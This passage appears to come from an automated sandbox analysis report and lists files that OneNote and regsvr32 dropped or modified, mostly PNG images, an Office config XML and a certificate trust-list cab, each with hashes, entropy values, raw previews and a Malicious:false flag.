                                                                                                        SHA-256:95B0A5ACC5BF70D3ABDFD091D0C9F9063AA4FDE65BD34DBF16786082E1992E72
                                                                                                        SHA-512:B38458C7FA2825AFB72794F374827403D5946B1132E136A0CE075DFD351277CF7D957C88DC8A1E4ADC3BCAE1FA8010DAE3831E268E910D517691DE24326391A6
                                                                                                        Malicious:false
                                                                                                        Preview:MSCF....v.......,...................I.................BVrl .authroot.stl....oJ5..CK..8U....a..3.1.P. J.".t..2F2e.dHH......$E.KB.2D..-SJE....^..'..y.}..,{m.....\...]4.G.......h....148...e.gr.....48:.L...g.....Xef.x:..t...J...6-....kW6Z>....&......ye.U.Q&z:.vZ..._....a...]..T.E.....B.h.,...[....V.O.3..EW.x.?.Q..$.@.W..=.B.f..8a.Y.JK..g./%p..C.4CD.s..Jd.u..@.g=...a.. .h%..'.xjy7.E..\.....A..':.4TdW?Ko3$.Hg.z.d~....../q..C.....`...A[ W(.........9...GZ.;....l&?........F...p?... .p.....{S.L4..v.+...7.T?.....p..`..&..9.......f...0+.L.....1.2b)..vX5L'.~....2vz.,E.Ni.{#...o..w.?.#.3..h.v<.S%.].tD@!Le.w.q.7.8....QW.FT.....hE.........Y............./.%Q...k...*.Y.n..v.A..../...>B..5\..-Ko.......O<.b.K.{.O.b...._.7...4.;%9N..K.X>......kg-9..r.c.g.G|.*[.-...HT...",?.q...ad....7RE.......!f..#../....?.-.^.K.c^...+{.g......]<..$.=.O....ii7.wJ+S..Z..d.....>..J*...T..Q7..`.r,<$....\d:K`..T.n....N.....C..j.;.1SX..j....1...R....+....Yg....]....3..9..S..D..`.
                                                                                                        Process:C:\Windows\System32\regsvr32.exe
                                                                                                        File Type:data
                                                                                                        Category:modified
                                                                                                        Size (bytes):328
                                                                                                        Entropy (8bit):3.1274376123142225
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:kKwry/7UN+SkQlPlEGYRMY9z+4KlDA3RUecZUt:ACvkPlE99SNxAhUext
                                                                                                        MD5:0B7439ADAAE95E39C63EA908B028DF12
                                                                                                        SHA1:1111DDEAA809432990D858EF2BE48F9B173D63B8
                                                                                                        SHA-256:4564A41381FAF72080564397DAB2AC8024714211E8DC03FAF958E017C335570E
                                                                                                        SHA-512:5E9654C59EFAB27C0BC9A3371480CCD80355B6056B207D9BDD421FDF69A66E4B0A8D81519126947846C29BF3EE075E862C45F6FA141C23286FEC0216E3538459
                                                                                                        Malicious:false
                                                                                                        Preview:p...... ........4j..X..(....................................................... ..........).K......&...........v...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.2.f.9.2.9.a.7.4.b.d.9.1.:.0."...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):154907
                                                                                                        Entropy (8bit):5.352021939336454
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:Z+C76gfYBIB9guw6LQ9DQl+zQxik4F77nXmvidlXRpE6Lhz67:IcQ9DQl+zrXgb
                                                                                                        MD5:A6F7EFD58FEC4F8DB94CF004C4E8D79C
                                                                                                        SHA1:7B67839C7125D7B5DB5A38AAA83858F8214A3F5B
                                                                                                        SHA-256:ECBCD9BB5D855E0CA8AC392992269B0266F0D6A30E72C1C7FA434E41155871EB
                                                                                                        SHA-512:7DA06FA44734437443835E3889C96191C569ACF4ED9E6D483A121A0390B6011C437C4B9DAC8E68D08A99E672DA2ABA15400D8390BA7CC14D8E080F32302F4D75
                                                                                                        Malicious:false
                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2023-03-17T15:44:11">.. Build: 16.0.16310.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.ResourceId]" o:authorityUrl="[ADALAuthorityU
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3679
                                                                                                        Entropy (8bit):7.931319059366604
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                        MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                        SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                        SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                        SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2232
                                                                                                        Entropy (8bit):7.837610270261933
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                        MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                        SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                        SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                        SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13084
                                                                                                        Entropy (8bit):7.940058639272698
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                        MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                        SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                        SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                        SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4847
                                                                                                        Entropy (8bit):7.950192613458318
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                        MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                        SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                        SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                        SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1657
                                                                                                        Entropy (8bit):7.80882577056055
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                        MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                        SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                        SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                        SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2210
                                                                                                        Entropy (8bit):7.86853667196985
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                        MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                        SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                        SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                        SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14458
                                                                                                        Entropy (8bit):7.944094738048628
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                        MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                        SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                        SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                        SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13030
                                                                                                        Entropy (8bit):7.948664903731204
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                        MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                        SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                        SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                        SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3879
                                                                                                        Entropy (8bit):7.9281351307465044
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                        MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                        SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                        SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
